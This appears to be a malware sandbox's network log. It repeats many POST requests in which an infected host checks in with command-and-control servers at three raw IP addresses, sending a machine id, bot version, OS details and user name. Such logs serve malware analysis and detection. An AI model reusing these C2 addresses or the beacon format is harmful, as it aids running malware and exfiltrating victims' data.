                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
